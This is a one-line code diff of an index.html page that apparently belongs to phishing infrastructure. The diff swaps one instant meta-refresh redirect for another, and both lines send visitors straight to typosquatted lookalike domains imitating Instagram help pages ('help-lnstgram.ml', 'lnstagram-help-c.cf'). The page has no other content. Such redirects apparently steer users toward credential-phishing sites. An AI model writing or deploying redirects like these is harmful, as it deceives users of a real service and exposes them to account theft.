--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<html><head><meta http-equiv="refresh" content="0;URL=http://help-lnstgram.ml/"></head></html>
+<html><head><meta http-equiv="refresh" content="0;URL=http://lnstagram-help-c.cf"></head></html>
